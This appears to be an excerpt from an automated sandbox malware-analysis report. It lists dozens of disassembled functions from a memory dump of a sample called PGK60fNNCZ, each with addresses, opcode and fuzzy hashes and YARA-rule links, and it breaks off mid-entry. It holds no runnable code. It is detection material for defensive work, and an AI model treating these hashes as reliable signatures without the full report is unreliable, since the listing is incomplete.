                                                            • Instruction ID: e89d088ec1cdefc72f5900ce39dd7be09c9ea95d633cbb39a77912e6f6fc67ad
                                                            • Opcode Fuzzy Hash: c2b864bb447b111390b0492f27cb0525a5a514b6a3e750b62394c4db2d8b1518
                                                            • Instruction Fuzzy Hash: 3331E032B04611DFEB12EE248880AABB7A6AF94760F114428FC55A7211DE34DC01B7E1
                                                            Function 00F98550 Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f06bcdb62cb284ff6eedce658a26fdef0b799a44a1b59896f327143073d166c7
                                                            • Instruction ID: 8e3426168135da7002c7b884dec1817206b61b1600acaf6833d57a20874a32fb
                                                            • Opcode Fuzzy Hash: f06bcdb62cb284ff6eedce658a26fdef0b799a44a1b59896f327143073d166c7
                                                            • Instruction Fuzzy Hash: DB317E72A093018FE760CF19C840B2AB7E4FF98760F19496DE984973A1DB75EC48DB91
                                                            Function 00FCA6C7 Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                            • Instruction ID: 48ab773ba490d3de3453f2c23f44c952eb38650edcf485a0cfeaadba2f714607
                                                            • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                            • Instruction Fuzzy Hash: 163148B2B00B05AFD761CF69CE42B57B7F8BF08B54F14092DA59AC3691E630F9009B61
                                                            Function 0103EBD0 Relevance: .1, Instructions: 91COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6bcf5c57677d8f822c903fc5b8a37aee8816c022d4da080a934b2f0e6533c332
                                                            • Instruction ID: 9f063359ed2e206202d52dfc51e7909be1798142c9fc8013b784b39ffce5e69f
                                                            • Opcode Fuzzy Hash: 6bcf5c57677d8f822c903fc5b8a37aee8816c022d4da080a934b2f0e6533c332
                                                            • Instruction Fuzzy Hash: 1231A9B1A193058FC721EF19C44091EBBE5FFC9614F044AAEF4C8AB202D331D942CB82
                                                            Function 00FB438F Relevance: .1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f898a4da32814718b1e9dd8f9690aa4cce5cd0a5332ff20d167b2c0ebe2a705
                                                            • Instruction ID: 471a15c5277d972292e80170209411ccf82261dd5cad8376cd20ac5d10866fbc
                                                            • Opcode Fuzzy Hash: 7f898a4da32814718b1e9dd8f9690aa4cce5cd0a5332ff20d167b2c0ebe2a705
                                                            • Instruction Fuzzy Hash: E631A172A00205DFC720DFA5CE81BAEB7FAAF84704F108569E585D7296D734E941EF50
                                                            Function 00F8C156 Relevance: .1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 119c6b5a8e4709bd7c9260e0b3c51b12a2058954eac5e637df8ffa00da8da0a5
                                                            • Instruction ID: 42da847b90f51cbaa029c88a54845c646405f19970805342f6840849aba71e7e
                                                            • Opcode Fuzzy Hash: 119c6b5a8e4709bd7c9260e0b3c51b12a2058954eac5e637df8ffa00da8da0a5
                                                            • Instruction Fuzzy Hash: C0313BB19002509BCB20AF18CC41BA977B4FF45314F54C1A9EC859B782EE39DD85EB90
                                                            Function 0104C3CD Relevance: .1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                            • Instruction ID: e1aee40cf7c4fe836542b7e7a0d292d67c78a3847d3018ff1a82ff460b9534c3
                                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                            • Instruction Fuzzy Hash: E3213B7660165167DB15AB948E41ABABBB5EF80710F00802AFBD586691FA38ED40C360
                                                            Function 00F8E420 Relevance: .1, Instructions: 88COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb1c2b02fcf3cf75e9445ed89b0880106fdfcb03dfc834eab62f79a5f11398d3
                                                            • Instruction ID: 626a4093eaedbb78f6bfde3812257d4e7a1e0d7ed2c8b10da0e8011c568b3aa3
                                                            • Opcode Fuzzy Hash: cb1c2b02fcf3cf75e9445ed89b0880106fdfcb03dfc834eab62f79a5f11398d3
                                                            • Instruction Fuzzy Hash: 6B31F936A4152C9BDB31EF14CC42FEEB7B9EB15750F0500A1F549AB290D674AE80EF90
                                                            Function 00FC44B0 Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f0efd0830c203bca8899d31bee8b0eedeebb5e62de9bb4964a4185efe92afdc4
                                                            • Instruction ID: 9b619cda49a06d0d8b2aa2b9bf5e684eaa874bfb2e752eeb2d5ce3fac1e5a2ee
                                                            • Opcode Fuzzy Hash: f0efd0830c203bca8899d31bee8b0eedeebb5e62de9bb4964a4185efe92afdc4
                                                            • Instruction Fuzzy Hash: 7021C072A047069BC722DF18C952F6B77E4FB88720F05492DFC549B241C734E900ABA2
                                                            Function 00FC4588 Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                            • Instruction ID: 220c8fa9ee3a59a4c626d9acd558ea0a66df7007738034ffa6e96a4205676202
                                                            • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                            • Instruction Fuzzy Hash: DE219132A00609EBCB11CF68CA91F8EBBB5FF49710F108069ED259B245D674EE05AB90
                                                            Function 00F8E388 Relevance: .1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                            • Instruction ID: 26a8a21483ad38cada2e319b32a169f329243502cb1b77525aa22267996e1089
                                                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                            • Instruction Fuzzy Hash: 0F31BC31600644EFDB21DF68C884FAAB7F9EF85354F2045A9E556CB681E730EE01EB50
                                                            Function 0100E609 Relevance: .1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 547a3260a5896d9b36f3c730a01f79631f40488d304f6c511759d1856d5ff890
                                                            • Instruction ID: ace8bb056caa80dfb45959608b033a9a3b963caa6a61752e533b42e2de723d7d
                                                            • Opcode Fuzzy Hash: 547a3260a5896d9b36f3c730a01f79631f40488d304f6c511759d1856d5ff890
                                                            • Instruction Fuzzy Hash: 40317E796002059FDB15CF18D8849AEB7B5EF88344F158869F885AB391EB71E940CB90
                                                            Function 010106F1 Relevance: .1, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 45e71aa018c6e6884d7e016e5d2d51b7d20952c385b42d912bd4ee3fd28c4d5d
                                                            • Instruction ID: b90a603baadda5fa2dce6b63a87ec11aaf081926751abd94b935b060d4a109af
                                                            • Opcode Fuzzy Hash: 45e71aa018c6e6884d7e016e5d2d51b7d20952c385b42d912bd4ee3fd28c4d5d
                                                            • Instruction Fuzzy Hash: CF219F71D00629ABCF20DF59CC81ABEB7F4FF48740B54406AF981AB254D738AD42DBA1
                                                            Function 0101019F Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4db68941e5a97e3d8bdc140be82df5bd24f5490b142da43f41c29e1b1653ae23
                                                            • Instruction ID: 491c3a4fc45881c687ff636413fac0d48cab654fb2f8b9d48ec8fdb3a1872139
                                                            • Opcode Fuzzy Hash: 4db68941e5a97e3d8bdc140be82df5bd24f5490b142da43f41c29e1b1653ae23
                                                            • Instruction Fuzzy Hash: 38218BB1600644AFD715DBA8DD44A6AB7E8FF49740F1400A9F984D7691E638EE40CB64
                                                            Function 01010283 Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 65a12b715dcd73125bfba26e395bf07845d385797dcc645f9ba277e24656e992
                                                            • Instruction ID: 4428d212833dab2e2ec6146106ee650acc707d1eaa1479503527f119e2fafd78
                                                            • Opcode Fuzzy Hash: 65a12b715dcd73125bfba26e395bf07845d385797dcc645f9ba277e24656e992
                                                            • Instruction Fuzzy Hash: FD21D0729043459BD711EF5DCD44B9BBBECAF91340F0884A6BDC0C725AD738DA88C6A2
                                                            Function 00FB2835 Relevance: .1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb919f2444f5db1560dca672e60b24b6589cb3da86b4641547599cb235c50604
                                                            • Instruction ID: 1bde6e91166aa686fa615c80b52b25be18cc4e497116343c1b7b7143f575fdfc
                                                            • Opcode Fuzzy Hash: bb919f2444f5db1560dca672e60b24b6589cb3da86b4641547599cb235c50604
                                                            • Instruction Fuzzy Hash: BF213B72B44685DBE3225769CC04B687794AF41774F280361FA649FAF2DB6CCC01A601
                                                            Function 00FCA30B Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1ae6a94d05956ae3bad0af54f0c0092cf751b05646da1e8ebc6e34201f61dcea
                                                            • Instruction ID: 992b182521a7d43ef23a9894390c45526d1ac64617093285ad83b73068d8e8c0
                                                            • Opcode Fuzzy Hash: 1ae6a94d05956ae3bad0af54f0c0092cf751b05646da1e8ebc6e34201f61dcea
                                                            • Instruction Fuzzy Hash: B021CC75200A419FC725DF28CD02B06B7F6AF08B18F24846CA489CB762E336E842DB94
                                                            Function 0104A49A Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a6be1e2f12cac2bb95829dbbb5cad57114fa3f564a5bc2e41bc84a2a51bdcc6
                                                            • Instruction ID: 39e8a438211d5621ae9bb6d22c5494deaadf1fd2c7343ae58cf270c579c8e01f
                                                            • Opcode Fuzzy Hash: 4a6be1e2f12cac2bb95829dbbb5cad57114fa3f564a5bc2e41bc84a2a51bdcc6
                                                            • Instruction Fuzzy Hash: BE1104B2380A10BBE72256549C81F2B76999BC4BB0F150038BB5A8B290DF60DC0187D5
                                                            Function 01010946 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 915a0f5133cb91cb38740c0761b3db3818cf77ce03b1724796e260b0df1e4836
                                                            • Instruction ID: b983c624b5932b9149e7212742708bf0ab0fef52060c22b287ad5c213cd849b6
                                                            • Opcode Fuzzy Hash: 915a0f5133cb91cb38740c0761b3db3818cf77ce03b1724796e260b0df1e4836
                                                            • Instruction Fuzzy Hash: 1F2116B1E00309ABCB20DFAAD8819AEFBF9FF98700F10412FE585A7254D6749981CB50
                                                            Function 010280A8 Relevance: .1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                            • Instruction ID: ea11a8897713fb834a410c8ade8141e02eaa37d7ed3aece359478d4bc8efc623
                                                            • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                            • Instruction Fuzzy Hash: 0A218E76A00219FFDF129F98CC40BAEBBFAEF88310F20445AF940A7291D734D9509B50
                                                            Function 00FC0124 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                            • Instruction ID: 38fac1f46b589462444d10d7234ec8abb70b41cd41a07f2f2c3cbfcf5127f905
                                                            • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                            • Instruction Fuzzy Hash: E011E273600606FFD7229B95CD42F9ABBB8EB80760F28402DF6008B180DA71ED45EB60
                                                            Function 00F98770 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a1ab5362411474124cb977f1bfaadc47669d229e625bac69f1a10bfe84a54924
                                                            • Instruction ID: 284a60daa41274472829dc533cd540880a89ad9b8309f982d99f50a7bc258095
                                                            • Opcode Fuzzy Hash: a1ab5362411474124cb977f1bfaadc47669d229e625bac69f1a10bfe84a54924
                                                            • Instruction Fuzzy Hash: 2D11C871B00610DBDF12CF89C5C0A56B7E5AF477A0725406DED089F205DAB2DD02D791
                                                            Function 00FCAAEE Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                            • Instruction ID: 1f196da29a0456e1fd716f5b3dcc1e9d064e3389686b78d42e76787acf0a80d4
                                                            • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                            • Instruction Fuzzy Hash: 3B21A972A00A0ADFC7218F49C642F66F7E6EBD4B24F20807DE44A87621C730ED00EB90
                                                            Function 00F980E9 Relevance: .1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 74f4114385da08da7050b844cbbaa661732dfe761440408873083eec74d174a2
                                                            • Instruction ID: d24fe338913d9aa43310aad95d816b6f43a462d95bcc075892bd70dca72eda00
                                                            • Opcode Fuzzy Hash: 74f4114385da08da7050b844cbbaa661732dfe761440408873083eec74d174a2
                                                            • Instruction Fuzzy Hash: C5215B76A00205DFDB18CF98C581BAEBBB5FB89758F24416DD105AB310CB72AE47DB90
                                                            Function 00FC674D Relevance: .1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2addd86197cfd21c8c764b3e87130494a426c39bbfc1c2744af426efbf43f3cc
                                                            • Instruction ID: 5e2748c428c4fa167568c143004f040563a13ccfff827cee0b8f476655aab843
                                                            • Opcode Fuzzy Hash: 2addd86197cfd21c8c764b3e87130494a426c39bbfc1c2744af426efbf43f3cc
                                                            • Instruction Fuzzy Hash: 60219D71614A01EFC7208F68C982F66B3F8FF44754F10882DE59AC7651DA34AD50EB60
                                                            Function 00FBE8C0 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 615800d4798e131860a0b1c0e2a105621231dd050910071c9f88665516812467
                                                            • Instruction ID: 42cf4d528612dfa3b832d47b123416377ed1aac3f3e4ea9399e7b82b12212979
                                                            • Opcode Fuzzy Hash: 615800d4798e131860a0b1c0e2a105621231dd050910071c9f88665516812467
                                                            • Instruction Fuzzy Hash: A31104737041189FCB19EB29CC91ABB7257EFD5370B394539E9238B291E931DC06E690
                                                            Function 01026870 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eaca68cd674fbefbbe526b33eab2c9fa6fddf9dd31c090eb74e6c3da30444116
                                                            • Instruction ID: 48f76fe4072353ccea9b712df81f684bf431cdfd052e2d04be3c9981631476ae
                                                            • Opcode Fuzzy Hash: eaca68cd674fbefbbe526b33eab2c9fa6fddf9dd31c090eb74e6c3da30444116
                                                            • Instruction Fuzzy Hash: 4311C172340624EFC722DB59CD40F9AB7ECEB9AB60F014024FA81DB251DA76E901C790
                                                            Function 00FC66B0 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3f1908fb821a3596d11bc1d528ceda9c4268eaa2c36852d20f7bf57cb74f656c
                                                            • Instruction ID: b2b2fc8d01488fbca9b508471273449361264ae032d57dbf4ef65fd5abab393e
                                                            • Opcode Fuzzy Hash: 3f1908fb821a3596d11bc1d528ceda9c4268eaa2c36852d20f7bf57cb74f656c
                                                            • Instruction Fuzzy Hash: A511BFB6E05206DFCB24DF99CA81F5ABBE4AF84724B16447DE845DB311EA34DD00EB90
                                                            Function 0105A8E4 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                            • Instruction ID: 75db3c9596420f85787e0d3e2b02afa8ef89ab4e75de03adacda25e95a25931b
                                                            • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                            • Instruction Fuzzy Hash: C311EF36A00919EFDB19CB58C805A9EBBF5EF84310F058269EC96A7340E631AE01CB80
                                                            Function 00F90AD0 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                            • Instruction ID: 7fe5b91bd7acbbbf8b11fd7781e2f9d7d95722db8dac9eafee9ae2d632c146eb
                                                            • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                            • Instruction Fuzzy Hash: 472106B5A00B059FD3A0CF29D481B52BBF4FB48B20F10492EE98AC7B40E771E814CB90
                                                            Function 0101E7E1 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                            • Instruction ID: 55e73c205c85c7a9073998fd1ed0ef36d4a904d17162f5ca9286cc724a2bc954
                                                            • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                            • Instruction Fuzzy Hash: E0116632A00600EBEB229F48C840B5EBAE6EF45754F058468EE899B264DA79DD41DB90
                                                            Function 00FB27ED Relevance: .1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 47e34525ce8574b1b493da24ee401940b0fcb8681bc3971d0b759314d6c3f6b7
                                                            • Instruction ID: 554fc48cbb6c87e3ad2bf28b95444c428c7a68d9111b15f92042842462094f1e
                                                            • Opcode Fuzzy Hash: 47e34525ce8574b1b493da24ee401940b0fcb8681bc3971d0b759314d6c3f6b7
                                                            • Instruction Fuzzy Hash: 8A014E72705648AFE316A36ADC44F77778CEF417A0F150075F9448B661DA18DC00F272
                                                            Function 00F94690 Relevance: .1, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ce86fcae609cea2e0c0b5fe9a37d02903fc6dc3831b758469b94737c40124b2
